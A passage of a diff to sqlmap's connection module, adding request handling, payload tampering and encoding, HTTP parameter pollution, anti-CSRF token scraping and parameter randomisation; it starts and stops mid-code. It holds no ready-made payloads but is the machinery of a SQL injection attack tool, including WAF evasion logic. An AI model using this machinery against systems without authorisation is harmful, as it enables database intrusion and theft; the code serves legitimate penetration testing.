re.sub(r"(?i)(,)br(,)?", lambda match: ',' if match.group(1) and match.group(2) else "", value) or "identity" + + del headers[key] + if isinstance(value, six.string_types): + for char in (r"\r", r"\n"): + value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value) + headers[getBytes(key) if six.PY2 else key] = getBytes(value.strip("\r\n")) # Note: Python3 has_header() expects non-bytes value + + if six.PY2: + url = getBytes(url) # Note: Python3 requires text while Python2 has problems when mixing text with binary POST + + if webSocket: + ws = websocket.WebSocket() + ws.settimeout(WEBSOCKET_INITIAL_TIMEOUT if kb.webSocketRecvCount is None else timeout) + ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically + ws.send(urldecode(post or "")) + + _page = [] + + if kb.webSocketRecvCount is None: + while True: + try: + _page.append(ws.recv()) + except websocket.WebSocketTimeoutException: + kb.webSocketRecvCount = len(_page) + break + else: + for i in xrange(max(1, kb.webSocketRecvCount)): + _page.append(ws.recv()) + + page = "\n".join(_page) + + ws.close() + code = ws.status + status = _http_client.responses[code] + + class _(dict): + pass + + responseHeaders = _(ws.getheaders()) + responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] + + requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in responseHeaders.items()]) + requestMsg += "\r\n%s" % requestHeaders + + if post is not None: + requestMsg += "\r\n\r\n%s" % getUnicode(post) + + requestMsg += "\r\n" + + threadData.lastRequestMsg = requestMsg + + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + else: + post = getBytes(post) + + if unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST: + if kb.place != HTTPMETHOD.POST: + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + else: + post = urldecode(post, convall=True) + post = encodeBase64(post) + + if target and cmdLineOptions.method or method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): + req = MethodRequest(url, post, headers) + req.set_method(cmdLineOptions.method or method) + elif url is not None: + req = _urllib.request.Request(url, post, headers) + else: + return None, None, None + + for function in kb.preprocessFunctions: + try: + function(req) + except Exception as ex: + errMsg = "error occurred while running preprocess " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + else: + post, headers = req.data, req.headers + + requestHeaders += "\r\n".join(["%s: %s" % (u"-".join(_.capitalize() for _ in getUnicode(key).split(u'-')) if hasattr(key, "capitalize") else getUnicode(key), getUnicode(value)) for (key, value) in req.header_items()]) + + if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: + conf.cj._policy._now = conf.cj._now = int(time.time()) + with conf.cj._cookies_lock: + cookies = conf.cj._cookies_for_request(req) + requestHeaders += "\r\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) + + if post is not None: + if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH) and not chunked: + requestHeaders += "\r\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) + + if not getRequestHeader(req, HTTP_HEADER.CONNECTION): + requestHeaders += "\r\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive") + + requestMsg += "\r\n%s" % requestHeaders + + if post is not None: + requestMsg += "\r\n\r\n%s" % getUnicode(post) + + if not chunked: + requestMsg += "\r\n" + + if not multipart: + threadData.lastRequestMsg = requestMsg + + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + else: + for char in (r"\r", r"\n"): + cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) + + conn = _urllib.request.urlopen(req) + + if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): + kb.authHeader = getUnicode(getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)) + + if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): + kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) + + # Return response object + if response: + return conn, None, None + + # Get HTTP response + if hasattr(conn, "redurl"): + page = (threadData.lastRedirectMsg[1] if kb.choices.redirect == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None + skipLogTraffic = kb.choices.redirect == REDIRECTION.NO + code = conn.redcode if not finalCode else code + else: + page = Connect._connReadProxy(conn) if not skipRead else None + + if conn: + code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes) + responseHeaders = conn.info() + responseHeaders[URI_HTTP_HEADER] = conn.geturl() if hasattr(conn, "geturl") else url + + if getattr(conn, "redurl", None) is not None: + responseHeaders[HTTP_HEADER.LOCATION] = conn.redurl + + responseHeaders = patchHeaders(responseHeaders) + kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader) + else: + code = None + responseHeaders = {} + + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling) + status = getUnicode(conn.msg) if conn and getattr(conn, "msg", None) else None + + kb.connErrorCounter = 0 + + if not refreshing: + refresh = responseHeaders.get(HTTP_HEADER.REFRESH, "").split("url=")[-1].strip() + + if extractRegexResult(META_REFRESH_REGEX, page): + refresh = extractRegexResult(META_REFRESH_REGEX, page) + + debugMsg = "got HTML meta refresh header" + logger.debug(debugMsg) + + if not refresh: + refresh = extractRegexResult(JAVASCRIPT_HREF_REGEX, page) + + if refresh: + debugMsg = "got Javascript redirect logic" + logger.debug(debugMsg) + + if refresh: + if kb.alwaysRefresh is None: + msg = "got a refresh intent " + msg += "(redirect like response common to login pages) to '%s'. " % refresh + msg += "Do you want to apply it from now on? [Y/n]" + + kb.alwaysRefresh = readInput(msg, default='Y', boolean=True) + + if kb.alwaysRefresh: + if re.search(r"\Ahttps?://", refresh, re.I): + url = refresh + else: + url = _urllib.parse.urljoin(url, refresh) + + threadData.lastRedirectMsg = (threadData.lastRequestUID, page) + kwargs["refreshing"] = True + kwargs["url"] = url + kwargs["get"] = None + kwargs["post"] = None + + try: + return Connect._getPageProxy(**kwargs) + except SqlmapSyntaxException: + pass + + # Explicit closing of connection object + if conn and not conf.keepAlive: + try: + if hasattr(conn.fp, '_sock'): + conn.fp._sock.close() + conn.close() + except Exception as ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) + + except SqlmapConnectionException as ex: + if conf.proxyList and not kb.threadException: + warnMsg = "unable to connect to the target URL ('%s')" % getSafeExString(ex) + logger.critical(warnMsg) + threadData.retriesCount = conf.retries + return Connect._retryProxy(**kwargs) + else: + raise + + except _urllib.error.HTTPError as ex: + page = None + responseHeaders = None + + if checking: + return None, None, None + + try: + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() + responseHeaders = patchHeaders(responseHeaders) + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE), percentDecode=not crawling) + except socket.timeout: + warnMsg = "connection timed out while trying " + warnMsg += "to get error page information (%d)" % ex.code + logger.warning(warnMsg) + return None, None, None + except KeyboardInterrupt: + raise + except: + pass + finally: + page = getUnicode(page) + + code = ex.code + status = getUnicode(getattr(ex, "reason", None) or getSafeExString(ex).split(": ", 1)[-1]) + + kb.originalCode = kb.originalCode or code + threadData.lastHTTPError = (threadData.lastRequestUID, code, status) + kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 + + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) + + if responseHeaders and getattr(responseHeaders, "headers", None): + logHeaders = "".join(getUnicode(responseHeaders.headers)).strip() + + logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time()) + + skipLogTraffic = True + + if conf.verbose <= 5: + responseMsg += getUnicode(logHeaders) + elif conf.verbose > 5: + responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]) + + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + + if code in conf.abortCode: + errMsg = "aborting due to detected HTTP code '%d'" % code + singleTimeLogMessage(errMsg, logging.CRITICAL) + raise SystemExit + + if ex.code not in (conf.ignoreCode or []): + if ex.code == _http_client.UNAUTHORIZED: + errMsg = "not authorized, try to provide right HTTP " + errMsg += "authentication type and valid credentials (%d). " % code + errMsg += "If this is intended, try to rerun by providing " + errMsg += "a valid value for option '--ignore-code'" + raise SqlmapConnectionException(errMsg) + elif chunked and ex.code in (_http_client.METHOD_NOT_ALLOWED, _http_client.LENGTH_REQUIRED): + warnMsg = "turning off HTTP chunked transfer encoding " + warnMsg += "as it seems that the target site doesn't support it (%d)" % code + singleTimeWarnMessage(warnMsg) + conf.chunked = kwargs["chunked"] = False + return Connect.getPage(**kwargs) + elif ex.code == _http_client.REQUEST_URI_TOO_LONG: + warnMsg = "request URI is marked as too long by the target. " + warnMsg += "you are advised to try a switch '--no-cast' and/or '--no-escape'" + singleTimeWarnMessage(warnMsg) + elif ex.code == _http_client.NOT_FOUND: + if raise404: + errMsg = "page not found (%d)" % code + raise SqlmapConnectionException(errMsg) + else: + debugMsg = "page not found (%d)" % code + singleTimeLogMessage(debugMsg, logging.DEBUG) + elif ex.code == _http_client.GATEWAY_TIMEOUT: + if ignoreTimeout: + return None if not conf.ignoreTimeouts else "", None, None + else: + warnMsg = "unable to connect to the target URL (%d - %s)" % (ex.code, _http_client.responses[ex.code]) + if threadData.retriesCount < conf.retries and not kb.threadException: + warnMsg += ". sqlmap is going to retry the request" + logger.critical(warnMsg) + return Connect._retryProxy(**kwargs) + elif kb.testMode: + logger.critical(warnMsg) + return None, None, None + else: + raise SqlmapConnectionException(warnMsg) + else: + debugMsg = "got HTTP error code: %d ('%s')" % (code, status) + logger.debug(debugMsg) + + except (_urllib.error.URLError, socket.error, socket.timeout, _http_client.HTTPException, struct.error, binascii.Error, ProxyError, SqlmapCompressionException, WebSocketException, TypeError, ValueError, OverflowError, AttributeError, OSError, AssertionError, KeyError): + tbMsg = traceback.format_exc() + + if conf.debug: + dataToStdout(tbMsg) + + if checking: + return None, None, None + elif "KeyError:" in tbMsg: + if "content-length" in tbMsg: + return None, None, None + else: + raise + elif "AttributeError:" in tbMsg: + if "WSAECONNREFUSED" in tbMsg: + return None, None, None + else: + raise + elif "no host given" in tbMsg: + warnMsg = "invalid URL address used (%s)" % repr(url) + raise SqlmapSyntaxException(warnMsg) + elif any(_ in tbMsg for _ in ("forcibly closed", "Connection is already closed", "ConnectionAbortedError")): + warnMsg = "connection was forcibly closed by the target URL" + elif "timed out" in tbMsg: + if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection timed out to the target URL" + elif "Connection reset" in tbMsg: + if not conf.disablePrecon: + singleTimeWarnMessage("turning off pre-connect mechanism because of connection reset(s)") + conf.disablePrecon = True + + if kb.testMode: + singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests") + kb.droppingRequests = True + warnMsg = "connection reset to the target URL" + elif "URLError" in tbMsg or "error" in tbMsg: + warnMsg = "unable to connect to the target URL" + match = re.search(r"Errno \d+\] ([^>\n]+)", tbMsg) + if match: + warnMsg += " ('%s')" % match.group(1).strip() + elif "NTLM" in tbMsg: + warnMsg = "there has been a problem with NTLM authentication" + elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload) + return None, None, None + elif "BadStatusLine" in tbMsg: + warnMsg = "connection dropped or unknown HTTP " + warnMsg += "status code received" + if not conf.agent and not conf.randomAgent: + warnMsg += ". Try to force the HTTP User-Agent " + warnMsg += "header with option '--user-agent' or switch '--random-agent'" + elif "IncompleteRead" in tbMsg: + warnMsg = "there was an incomplete read error while retrieving data " + warnMsg += "from the target URL" + elif "Handshake status" in tbMsg: + status = re.search(r"Handshake status ([\d]{3})", tbMsg) + errMsg = "websocket handshake status %s" % status.group(1) if status else "unknown" + raise SqlmapConnectionException(errMsg) + elif "SqlmapCompressionException" in tbMsg: + warnMsg = "problems with response (de)compression" + retrying = True + else: + warnMsg = "unable to connect to the target URL" + + if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)): + warnMsg += " or proxy" + + if silent: + return None, None, None + + with kb.locks.connError: + kb.connErrorCounter += 1 + + if kb.connErrorCounter >= MAX_CONSECUTIVE_CONNECTION_ERRORS and kb.choices.connError is None: + message = "there seems to be a continuous problem with connection to the target. " + message += "Are you sure that you want to continue? [y/N] " + + kb.choices.connError = readInput(message, default='N', boolean=True) + + if kb.choices.connError is False: + raise SqlmapSkipTargetException + + if "forcibly closed" in tbMsg: + logger.critical(warnMsg) + return None, None, None + elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead", "Interrupted system call")): + return None if not conf.ignoreTimeouts else "", None, None + elif threadData.retriesCount < conf.retries and not kb.threadException: + warnMsg += ". sqlmap is going to retry the request" + if not retrying: + warnMsg += "(s)" + logger.critical(warnMsg) + else: + logger.debug(warnMsg) + return Connect._retryProxy(**kwargs) + elif kb.testMode or kb.multiThreadMode: + logger.critical(warnMsg) + return None, None, None + else: + raise SqlmapConnectionException(warnMsg) + + finally: + for function in kb.postprocessFunctions: + try: + page, responseHeaders, code = function(page, responseHeaders, code) + except Exception as ex: + errMsg = "error occurred while running postprocess " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if isinstance(page, six.binary_type): + if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]): + page = six.text_type(page, errors="ignore") + else: + page = getUnicode(page) + + for _ in (getattr(conn, "redcode", None), code): + if _ is not None and _ in conf.abortCode: + errMsg = "aborting due to detected HTTP code '%d'" % _ + singleTimeLogMessage(errMsg, logging.CRITICAL) + raise SystemExit + + threadData.lastPage = page + threadData.lastCode = code + + socket.setdefaulttimeout(conf.timeout) + + # Dirty patch for Python3.11.0a7 (e.g. https://github.com/sqlmapproject/sqlmap/issues/5091) + if not sys.version.startswith("3.11."): + if conf.retryOn and re.search(conf.retryOn, page, re.I): + if threadData.retriesCount < conf.retries: + warnMsg = "forced retry of the request because of undesired page content" + logger.warning(warnMsg) + return Connect._retryProxy(**kwargs) + + processResponse(page, responseHeaders, code, status) + + if not skipLogTraffic: + if conn and getattr(conn, "redurl", None): + _ = _urllib.parse.urlsplit(conn.redurl) + _ = ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) + requestMsg = re.sub(r"(\n[A-Z]+ ).+?( HTTP/\d)", r"\g<1>%s\g<2>" % getUnicode(_).replace("\\", "\\\\"), requestMsg, 1) + + if kb.resendPostOnRedirect is False: + requestMsg = re.sub(r"(\[#\d+\]:\n)POST ", r"\g<1>GET ", requestMsg) + requestMsg = re.sub(r"(?i)Content-length: \d+\n", "", requestMsg) + requestMsg = re.sub(r"(?s)\n\n.+", "\n", requestMsg) + + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, conn.code, status) + elif "\n" not in responseMsg: + responseMsg += "[#%d] (%s %s):\r\n" % (threadData.lastRequestUID, code, status) + + if responseHeaders: + logHeaders = "".join(getUnicode(responseHeaders.headers)).strip() + + logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]), start, time.time()) + + if conf.verbose <= 5: + responseMsg += getUnicode(logHeaders) + elif conf.verbose > 5: + responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_READ_SIZE]) + + if not multipart: + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) + + return page, responseHeaders, code + + @staticmethod + @stackedmethod + def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, disableTampering=False, ignoreSecondOrder=False): + """ + This method calls a function to get the target URL page content + and returns its page ratio (0 <= ratio <= 1) or a boolean value + representing False/True match in case of !getRatioValue + """ + + if conf.direct: + return direct(value, content) + + get = None + post = None + cookie = None + ua = None + referer = None + host = None + page = None + pageLength = None + uri = None + code = None + + if not place: + place = kb.injection.place or PLACE.GET + + kb.place = place + + if not auxHeaders: + auxHeaders = {} + + raise404 = place != PLACE.URI if raise404 is None else raise404 + method = method or conf.method + + postUrlEncode = kb.postUrlEncode + + value = agent.adjustLateValues(value) + payload = agent.extractPayload(value) + threadData = getCurrentThreadData() + + if conf.httpHeaders: + headers = OrderedDict(conf.httpHeaders) + contentType = max(headers[_] or "" if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else "" for _ in headers) or None + + if (kb.postHint or conf.skipUrlEncode) and postUrlEncode: + postUrlEncode = False + if not (conf.skipUrlEncode and contentType): # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5092 + conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] + contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) + conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) + if "urlencoded" in contentType: + postUrlEncode = True + + if payload: + delimiter = conf.paramDel or (DEFAULT_GET_POST_DELIMITER if place != PLACE.COOKIE else DEFAULT_COOKIE_DELIMITER) + + if not disableTampering and kb.tamperFunctions: + for function in kb.tamperFunctions: + hints = {} + + try: + payload = function(payload=payload, headers=auxHeaders, delimiter=delimiter, hints=hints) + except Exception as ex: + errMsg = "error occurred while running tamper " + errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex)) + raise SqlmapGenericException(errMsg) + + if not isinstance(payload, six.string_types): + errMsg = "tamper function '%s' returns " % function.__name__ + errMsg += "invalid payload type ('%s')" % type(payload) + raise SqlmapValueException(errMsg) + + value = agent.replacePayload(value, payload) + + if hints: + if HINT.APPEND in hints: + value = "%s%s%s" % (value, delimiter, hints[HINT.APPEND]) + + if HINT.PREPEND in hints: + if place == PLACE.URI: + match = re.search(r"\w+\s*=\s*%s" % PAYLOAD_DELIMITER, value) or re.search(r"[^?%s/]=\s*%s" % (re.escape(delimiter), PAYLOAD_DELIMITER), value) + if match: + value = value.replace(match.group(0), "%s%s%s" % (hints[HINT.PREPEND], delimiter, match.group(0))) + else: + value = "%s%s%s" % (hints[HINT.PREPEND], delimiter, value) + + logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\')) + + if place == PLACE.CUSTOM_POST and kb.postHint: + if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): + # payloads in SOAP/XML should have chars > and < replaced + # with their HTML encoded counterparts + payload = payload.replace("&#", SAFE_HEX_MARKER) + payload = payload.replace('&', "&").replace('>', ">").replace('<', "<").replace('"', """).replace("'", "'") # Reference: https://stackoverflow.com/a/1091953 + payload = payload.replace(SAFE_HEX_MARKER, "&#") + elif kb.postHint == POST_HINT.JSON: + payload = escapeJsonValue(payload) + elif kb.postHint == POST_HINT.JSON_LIKE: + payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') + payload = escapeJsonValue(payload) + payload = payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') + value = agent.replacePayload(value, payload) + else: + # GET, POST, URI and Cookie payload needs to be thoroughly URL encoded + if (place in (PLACE.GET, PLACE.URI, PLACE.COOKIE) or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper()) and not conf.skipUrlEncode or place in (PLACE.POST, PLACE.CUSTOM_POST) and postUrlEncode: + skip = False + + if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0].upper() == HTTP_HEADER.COOKIE.upper(): + if kb.choices.cookieEncode is None: + msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 + kb.choices.cookieEncode = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True) + if not kb.choices.cookieEncode: + skip = True + + if not skip: + if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path) + value = urlencode(value, spaceplus=kb.postSpaceToPlus) + payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus) + value = agent.replacePayload(value, payload) + postUrlEncode = False + + if conf.hpp: + if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)): + warnMsg = "HTTP parameter pollution should work only against " + warnMsg += "ASP(.NET) targets" + singleTimeWarnMessage(warnMsg) + if place in (PLACE.GET, PLACE.POST): + _ = re.escape(PAYLOAD_DELIMITER) + match = re.search(r"(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) + if match: + payload = match.group("value") + + for splitter in (urlencode(' '), ' '): + if splitter in payload: + prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*")) + parts = payload.split(splitter) + parts[0] = "%s%s" % (parts[0], suffix) + parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1]) + for i in xrange(1, len(parts) - 1): + parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix) + payload = "".join(parts) + + for splitter in (urlencode(','), ','): + payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name"))) + + value = agent.replacePayload(value, payload) + else: + warnMsg = "HTTP parameter pollution works only with regular " + warnMsg += "GET and POST parameters" + singleTimeWarnMessage(warnMsg) + + if place: + value = agent.removePayloadDelimiters(value) + + if PLACE.GET in conf.parameters: + get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value + elif place == PLACE.GET: # Note: for (e.g.) checkWaf() when there are no GET parameters + get = value + + if PLACE.POST in conf.parameters: + post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value + elif place == PLACE.POST: + post = value + + if PLACE.CUSTOM_POST in conf.parameters: + post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, "") if place != PLACE.CUSTOM_POST or not value else value + post = post.replace(ASTERISK_MARKER, '*') if post else post + + if PLACE.COOKIE in conf.parameters: + cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value + + if PLACE.USER_AGENT in conf.parameters: + ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value + + if PLACE.REFERER in conf.parameters: + referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value + + if PLACE.HOST in conf.parameters: + host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value + + if PLACE.URI in conf.parameters: + uri = conf.url if place != PLACE.URI or not value else value + else: + uri = conf.url + + if value and place == PLACE.CUSTOM_HEADER: + if value.split(',')[0].capitalize() == PLACE.COOKIE: + cookie = value.split(',', 1)[-1] + else: + auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1] + + if conf.csrfToken: + token = AttribDict() + + def _adjustParameter(paramString, parameter, newValue): + retVal = paramString + + if urlencode(parameter) in paramString: + parameter = urlencode(parameter) + + match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) + if match: + retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) + else: + match = re.search(r"(%s[\"']\s*:\s*[\"'])([^\"']*)" % re.escape(parameter), paramString, re.I) + if match: + retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) + + return retVal + + for attempt in xrange(conf.csrfRetries + 1): + if token: + break + + if attempt > 0: + warnMsg = "unable to find anti-CSRF token '%s' at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) + warnMsg += ". sqlmap is going to retry the request" + logger.warning(warnMsg) + + page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.csrfData or (conf.data if conf.csrfUrl == conf.url else None), method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) + page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...') + + match = re.search(r"(?i)<input[^>]+\bname=[\"']?(?P<name>%s)\b[^>]*\bvalue=[\"']?(?P<value>[^>'\"]*)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"(?i)<input[^>]+\bvalue=[\"']?(?P<value>[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P<name>%s)\b" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"(?P<name>%s)[\"']:[\"'](?P<value>[^\"']+)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"\b(?P<name>%s)\s*[:=]\s*(?P<value>\w+)" % conf.csrfToken, getUnicode(headers), re.I) + + if not match: + match = re.search(r"\b(?P<name>%s)\s*=\s*['\"]?(?P<value>[^;'\"]+)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"<meta\s+name=[\"']?(?P<name>%s)[\"']?[^>]+\b(value|content)=[\"']?(?P<value>[^>\"']+)" % conf.csrfToken, page or "", re.I) + + if match: + token.name, token.value = match.group("name"), match.group("value") + + match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value) + if match: + token.value = "".join(_unichr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) + + if not token: + if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == _http_client.OK: + if headers and PLAIN_TEXT_CONTENT_TYPE in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): + token.name = conf.csrfToken + token.value = page + + if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): + for _ in conf.cj: + if re.search(conf.csrfToken, _.name, re.I): + token.name, token.value = _.name, _.value + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if post: + post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) + elif get: + get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) + else: + get = "%s=%s" % (token.name, token.value) + break + + if not token: + errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) + if not conf.csrfUrl: + errMsg += ". You can try to rerun by providing " + errMsg += "a valid value for option '--csrf-url'" + raise SqlmapTokenException(errMsg) + + if token: + token.value = token.value.strip("'\"") + + for candidate in (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST, PLACE.URI): + if candidate in conf.parameters: + if candidate == PLACE.URI and uri: + uri = _adjustParameter(uri, token.name, token.value) + elif candidate == PLACE.GET and get: + get = _adjustParameter(get, token.name, token.value) + elif candidate in (PLACE.POST, PLACE.CUSTOM_POST) and post: + post = _adjustParameter(post, token.name, token.value) + + for i in xrange(len(conf.httpHeaders)): + if conf.httpHeaders[i][0].lower() == token.name.lower(): + conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value) + + if conf.rParam: + def _randomizeParameter(paramString, randomParameter): + retVal = paramString + match = re.search(r"(\A|\b)%s=(?P<value>[^&;]*)" % re.escape(randomParameter), paramString) + if match: + origValue = match.group("value") + newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0] + retVal = re.sub(r"(\A|\b)%s=[^&;]*" % re.escape(randomParameter), "%s=%s" % (randomParameter, newValue), paramString) + else: + match = re.search(r"(\A|\b)(%s\b[^\w]+)(?P<value>\w+)" % re.escape(randomParameter), paramString) + if match: + origValue = match.group("value") + newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0] + retVal = paramString.replace(match.group(0), "%s%s" % (match.group(2), newValue)) + return retVal + + for randomParameter in conf.rParam: + for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST): + if item in conf.parameters: + if item == PLACE.GET and get: + get = _randomizeParameter(get, randomParameter) + elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post: + post = _randomizeParameter(post, randomParameter) + elif item == PLACE.COOKIE and cookie: + cookie = _randomizeParameter(cookie, randomParameter) + elif item == PLACE.URI and uri: + uri = _randomizeParameter(uri, randomParameter) + + if conf.evalCode: + 